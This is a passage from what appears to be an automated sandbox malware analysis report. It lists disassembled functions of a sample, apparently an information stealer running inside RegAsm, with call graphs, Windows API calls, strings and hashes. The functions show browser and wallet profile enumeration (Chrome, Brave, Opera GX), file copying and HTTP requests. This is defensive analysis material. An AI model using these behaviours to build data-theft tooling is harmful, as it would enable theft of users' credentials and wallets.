                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                • API String ID: 2238633743-951535364
                                                                                                                                                                                                • Opcode ID: 02a848fa4e7c33424dc08f84c87d6b2e2d4eb3ab9048403a51dd9899c4eec50b
                                                                                                                                                                                                • Instruction ID: e03eed0801ec58f57f5b11818b4405cb7ce0920a969082d5a6e1302a6f7215fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02a848fa4e7c33424dc08f84c87d6b2e2d4eb3ab9048403a51dd9899c4eec50b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6042D97E911620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040B700 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1233 40b700-40b7b2 _EH_prolog call 40e912 call 40ea17 call 40ea8b call 40e9d0 call 40e97d * 2 call 40e912 * 2 call 40eb3c FindFirstFileA 1252 40b7b4-40b7f4 call 40e97d * 3 call 401061 call 40e97d 1233->1252 1253 40b7f9-40b7ff 1233->1253 1283 40c45b-40c480 call 40e97d * 2 1252->1283 1254 40b801-40b815 StrCmpCA 1253->1254 1256 40c3fb-40c40d FindNextFileA 1254->1256 1257 40b81b-40b82f StrCmpCA 1254->1257 1256->1254 1261 40c413-40c458 FindClose call 40e97d * 3 call 401061 call 40e97d 1256->1261 1257->1256 1259 40b835-40b8c1 call 40e986 call 40ea17 call 40ea8b * 2 call 40e9d0 call 40e97d * 3 1257->1259 1300 40ba26-40babb call 40ea8b * 4 call 40e9d0 call 40e97d * 3 1259->1300 1301 40b8c7-40b8e0 call 40eb3c StrCmpCA 1259->1301 1261->1283 1350 40bac1-40bae3 call 40e97d call 40eb3c StrCmpCA 1300->1350 1306 40b986-40ba21 call 40ea8b * 4 call 40e9d0 call 40e97d * 3 1301->1306 1307 40b8e6-40b981 call 40ea8b * 4 call 40e9d0 call 40e97d * 3 1301->1307 1306->1350 1307->1350 1359 40bd02-40bd17 StrCmpCA 1350->1359 1360 40bae9-40bafd StrCmpCA 1350->1360 1362 40bd19-40bd7c call 4010b1 call 40e949 * 3 call 40b302 1359->1362 1363 40bd8c-40bda1 StrCmpCA 1359->1363 1360->1359 1361 40bb03-40bc7c call 40e912 call 40fb47 call 40ea8b call 40ea17 call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 5 call 40eb3c * 2 call 40e912 call 40ea8b * 2 call 40e9d0 call 40e97d * 2 call 40e949 call 4061d7 1360->1361 1571 40bccb-40bcfd call 40eb3c call 40eb03 call 40eb3c call 40e97d * 2 1361->1571 1572 40bc7e-40bcc6 call 40e949 call 4010b1 call 413452 call 40e97d 1361->1572 1423 40bd81-40bd87 1362->1423 1364 40bda3-40bdba call 40eb3c StrCmpCA 1363->1364 1365 40be1d-40be38 call 40e949 call 40fcc8 1363->1365 1376 40bdc0-40bdc3 1364->1376 1377 40c36a-40c371 1364->1377 1387 40bebe-40bed3 StrCmpCA 1365->1387 1388 40be3e-40be41 1365->1388 1376->1377 1381 40bdc9-40be1b call 4010b1 call 40e949 * 2 1376->1381 1384 40c373-40c3e0 call 40e949 * 2 call 40e912 call 4010b1 call 40b700 1377->1384 1385 40c3eb-40c3f6 call 40eb03 * 2 1377->1385 1434 40be9c-40beae call 40e949 call 406783 1381->1434 1448 40c3e5 1384->1448 1385->1256 1400 40c157-40c16c StrCmpCA 1387->1400 1401 40bed9-40bfca call 40e912 call 40fb47 call 40ea8b call 40ea17 call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 5 call 40eb3c * 2 CopyFileA 1387->1401 1388->1377 1395 40be47-40be99 call 4010b1 call 40e949 call 40e912 1388->1395 1395->1434 1400->1377 1404 40c172-40c263 call 40e912 call 40fb47 call 40ea8b call 40ea17 call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 5 call 40eb3c * 2 CopyFileA 1400->1404 1514 40bfd0-40c0a8 call 4010b1 call 40e949 * 3 call 406e76 call 4010b1 call 40e949 * 3 call 4078df 1401->1514 1515 40c0ae-40c0c7 call 40eb3c StrCmpCA 1401->1515 1516 40c347-40c359 call 40eb3c DeleteFileA call 40eb03 1404->1516 1517 40c269-40c2cd call 4010b1 call 40e949 * 3 call 407212 1404->1517 1423->1377 1455 40beb3-40beb9 1434->1455 1448->1385 1455->1377 1514->1515 1527 40c138-40c14a call 40eb3c DeleteFileA call 40eb03 1515->1527 1528 40c0c9-40c132 call 4010b1 call 40e949 * 3 call 407f13 1515->1528 1543 40c35e 1516->1543 1569 40c2d2-40c341 call 4010b1 call 40e949 * 3 call 40752e 1517->1569 1550 40c14f-40c152 1527->1550 1528->1527 1549 40c361-40c365 call 40e97d 1543->1549 1549->1377 1550->1549 1569->1516 1571->1359 1572->1571
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B705
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00424BD3,00424BD2,00000000,?,00424D1C,?,?,00424BCF,?,?,00000000), ref: 0040B7A6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424D20,?,?,00000000), ref: 0040B80D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424D24,?,?,00000000), ref: 0040B827
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00424D28,?,?,00424BD6,?,?,00000000), ref: 0040B8D8
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                • API String ID: 3869166975-1816240570
                                                                                                                                                                                                • Opcode ID: b3a7f0ca53abb0bd45cb605ce0056d603617cadf8cdf15c499738707a88371d9
                                                                                                                                                                                                • Instruction ID: a06837af720b656b25216628b72489231ebbbab95c301b6f1e0304fd369a8655
                                                                                                                                                                                                • Opcode Fuzzy Hash: b3a7f0ca53abb0bd45cb605ce0056d603617cadf8cdf15c499738707a88371d9
                                                                                                                                                                                                • Instruction Fuzzy Hash: AC82B470900288EADF11EBB6C956BDDBBB4AF15304F1044AEF445732C2DB781B58DBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004041D4 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2621 4041d4-404262 _EH_prolog call 40e949 call 403a76 GetProcessHeap RtlAllocateHeap call 40eb3c InternetOpenA StrCmpCA 2628 404264 2621->2628 2629 404266-404269 2621->2629 2628->2629 2630 40439a-4043bd InternetCloseHandle call 40e97d * 2 2629->2630 2631 40426f-404289 InternetConnectA 2629->2631 2646 4043c0-4043ce 2630->2646 2633 404391-404394 InternetCloseHandle 2631->2633 2634 40428f-4042be HttpOpenRequestA 2631->2634 2633->2630 2636 4042c4-4042c6 2634->2636 2637 40438a-40438b InternetCloseHandle 2634->2637 2638 4042c8-4042d8 InternetSetOptionA 2636->2638 2639 4042de-404309 HttpSendRequestA HttpQueryInfoA 2636->2639 2637->2633 2638->2639 2641 40430b-404329 call 40e97d * 2 2639->2641 2642 40432e-404340 call 40fa62 2639->2642 2641->2646 2642->2641 2650 404342-404344 2642->2650 2650->2637 2652 404346 2650->2652 2653 404385-404388 2652->2653 2653->2637 2654 404348-404364 InternetReadFile 2653->2654 2654->2637 2655 404366-404383 call 40fab3 2654->2655 2655->2653
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004041D9
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404220
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00404227
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404246
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 0040425A
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040427E
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004042B4
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042D8
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042E3
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404301
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404359
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040438B
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404394
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040439D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                • String ID: GET
                                                                                                                                                                                                • API String ID: 1687531150-1805413626
                                                                                                                                                                                                • Opcode ID: 0b61ded6ca21000fec9273c9a3df7f69038a3abe7a4d9426c07ea5c307e3bc6c
                                                                                                                                                                                                • Instruction ID: 37e224c1a08062f93ec5ae7f373094c4e3bdef2c7412259edf85ae2320be00ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b61ded6ca21000fec9273c9a3df7f69038a3abe7a4d9426c07ea5c307e3bc6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89515EB2900219AFDB10DFE0CD85EEFBBBDEB49744F00512AFA01B6190D7745E448B65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A4CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2677 1b4a4cf0-1b4a4d2f 2678 1b4a4d30-1b4a4d86 call 1b49263a 2677->2678 2681 1b4a4d88-1b4a4d9b call 1b627fb0 2678->2681 2682 1b4a4daf 2678->2682 2687 1b4a52cd-1b4a52df call 1b4925bd 2681->2687 2688 1b4a4da1-1b4a4dad 2681->2688 2683 1b4a4db3-1b4a4dc2 call 1b629a70 2682->2683 2691 1b4a4dc8-1b4a4ddb 2683->2691 2692 1b4a526f-1b4a5271 2683->2692 2688->2683 2696 1b4a4de0-1b4a4df0 2691->2696 2693 1b4a52c8 2692->2693 2694 1b4a5273-1b4a527a 2692->2694 2693->2687 2697 1b4a52be 2694->2697 2698 1b4a527c-1b4a5283 2694->2698 2702 1b4a4e3c-1b4a4e43 2696->2702 2703 1b4a4df2-1b4a4dfe 2696->2703 2704 1b4a52c5 2697->2704 2699 1b4a528f-1b4a52b3 2698->2699 2700 1b4a5285-1b4a528c 2698->2700 2699->2693 2717 1b4a52b5-1b4a52bc 2699->2717 2700->2699 2707 1b4a4e4d-1b4a4e68 2702->2707 2708 1b4a4e45-1b4a4e47 2702->2708 2703->2707 2716 1b4a4e00-1b4a4e03 2703->2716 2704->2693 2710 1b4a4e6a-1b4a4e6f 2707->2710 2711 1b4a4e71-1b4a4e7f 2707->2711 2708->2707 2709 1b4a506d-1b4a507b call 1b492f5e 2708->2709 2723 1b4a50eb-1b4a5102 call 1b4925bd 2709->2723 2724 1b4a507d-1b4a5084 2709->2724 2714 1b4a4e81-1b4a4e94 call 1b493f53 2710->2714 2711->2714 2730 1b4a4eac 2714->2730 2731 1b4a4e96-1b4a4eaa call 1b53cab0 2714->2731 2720 1b4a4e25-1b4a4e3a 2716->2720 2721 1b4a4e05-1b4a4e08 2716->2721 2717->2704 2720->2696 2721->2720 2725 1b4a4e0a-1b4a4e0d 2721->2725 2732 1b4a50e1-1b4a50e8 2724->2732 2733 1b4a5086-1b4a508d 2724->2733 2725->2720 2726 1b4a4e0f-1b4a4e12 2725->2726 2726->2720 2737 1b4a4e14-1b4a4e17 2726->2737 2739 1b4a4eae-1b4a4ed1 2730->2739 2731->2739 2732->2723 2735 1b4a5099-1b4a50bd 2733->2735 2736 1b4a508f-1b4a5096 2733->2736 2735->2723 2761 1b4a50bf-1b4a50e0 call 1b4925bd 2735->2761 2736->2735 2737->2720 2741 1b4a4e19-1b4a4e1c 2737->2741 2742 1b4a4ed5-1b4a4eec CreateFileW 2739->2742 2741->2720 2745 1b4a4e1e-1b4a4e23 2741->2745 2747 1b4a4ef2-1b4a4ef7 2742->2747 2748 1b4a4f95 2742->2748 2745->2707 2745->2720 2750 1b4a4ef9-1b4a4f09 2747->2750 2751 1b4a4f40-1b4a4f4c 2747->2751 2749 1b4a4f99-1b4a4f9b 2748->2749 2752 1b4a4f9d-1b4a4fc1 call 1b49415b 2749->2752 2753 1b4a4fc4-1b4a4fc7 2749->2753 2755 1b4a4f0b 2750->2755 2756 1b4a4f0d-1b4a4f2e call 1b4a8c40 2750->2756 2764 1b4a4f4e-1b4a4f51 2751->2764 2765 1b4a4f91-1b4a4f93 2751->2765 2752->2753 2759 1b4a4fcd-1b4a4fdf call 1b492f5e 2753->2759 2760 1b4a5140-1b4a5146 2753->2760 2755->2756 2774 1b4a4f32-1b4a4f34 2756->2774 2775 1b4a4f30 2756->2775 2778 1b4a4fe1-1b4a4fe8 2759->2778 2779 1b4a5036-1b4a503b 2759->2779 2767 1b4a5148-1b4a5152 2760->2767 2768 1b4a5154-1b4a516d call 1b492f5e 2760->2768 2770 1b4a4f73-1b4a4f8c 2764->2770 2771 1b4a4f53-1b4a4f56 2764->2771 2765->2749 2767->2768 2791 1b4a516f-1b4a5176 2768->2791 2792 1b4a51c4-1b4a51c6 2768->2792 2770->2742 2771->2770 2777 1b4a4f58-1b4a4f5b 2771->2777 2782 1b4a4f3c 2774->2782 2783 1b4a4f36-1b4a4f3a 2774->2783 2775->2774 2777->2770 2784 1b4a4f5d-1b4a4f60 2777->2784 2785 1b4a4fea-1b4a4ff1 2778->2785 2786 1b4a502c 2778->2786 2787 1b4a5103-1b4a513f call 1b628850 call 1b596b50 call 1b4925bd 2779->2787 2788 1b4a5041-1b4a5046 2779->2788 2782->2751 2783->2748 2783->2782 2784->2770 2798 1b4a4f62-1b4a4f65 2784->2798 2799 1b4a4ffd-1b4a5021 2785->2799 2800 1b4a4ff3-1b4a4ffa 2785->2800 2806 1b4a5033 2786->2806 2788->2787 2801 1b4a504c-1b4a5068 2788->2801 2793 1b4a51ba 2791->2793 2794 1b4a5178-1b4a517f 2791->2794 2795 1b4a51c8-1b4a51ca 2792->2795 2796 1b4a51cc 2792->2796 2813 1b4a51c1 2793->2813 2802 1b4a518b-1b4a51af 2794->2802 2803 1b4a5181-1b4a5188 2794->2803 2804 1b4a51d1-1b4a51e2 2795->2804 2796->2804 2798->2770 2807 1b4a4f67-1b4a4f6a 2798->2807 2799->2779 2824 1b4a5023-1b4a502a 2799->2824 2800->2799 2801->2678 2802->2792 2831 1b4a51b1-1b4a51b8 2802->2831 2803->2802 2808 1b4a51e8-1b4a51f3 2804->2808 2809 1b4a51e4 2804->2809 2806->2779 2807->2770 2811 1b4a4f6c-1b4a4f71 2807->2811 2816 1b4a521f-1b4a526e call 1b4925bd 2808->2816 2817 1b4a51f5-1b4a5208 call 1b493f53 2808->2817 2809->2808 2811->2765 2811->2770 2813->2792 2829 1b4a520a-1b4a5219 call 1b53cab0 2817->2829 2830 1b4a521b 2817->2830 2824->2806 2829->2816 2829->2830 2830->2816 2831->2813
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1B4A4EE1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                • Opcode ID: b9fa8a1d3a11fd8627738a9737d6f3af24fd759ad8a35edf662cd4db341e5ea8
                                                                                                                                                                                                • Instruction ID: 8292b1eb1ed142b7558aef8602d3d9511895646fdd002ef7f8cb770271e1f32f
                                                                                                                                                                                                • Opcode Fuzzy Hash: b9fa8a1d3a11fd8627738a9737d6f3af24fd759ad8a35edf662cd4db341e5ea8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F1BF719043119BEB188F34D985BAF77E8BBA8315F00892DFDCAD6281D735D948CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040ECD4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040ECD9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004251F7,00000000,?,00000000), ref: 0040ED0B
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040ED19
                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040ED24
                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040ED4E
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040EDF2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                • API String ID: 2868853201-4001269591
                                                                                                                                                                                                • Opcode ID: f86d6cc1372bb5890f5c10c94293cb2d0650925ee5e8fd924d0eb1fd141a9395
                                                                                                                                                                                                • Instruction ID: 0fc2b7e35f4d6114d8ae3e9005ea3697fa52aa721323e90e6314f7b8594f7607
                                                                                                                                                                                                • Opcode Fuzzy Hash: f86d6cc1372bb5890f5c10c94293cb2d0650925ee5e8fd924d0eb1fd141a9395
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86311CB5901219EFDB00EFE6C985AEEBBB9FF48304F10446EE505B3281C7785A44CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F310 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F315
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F350
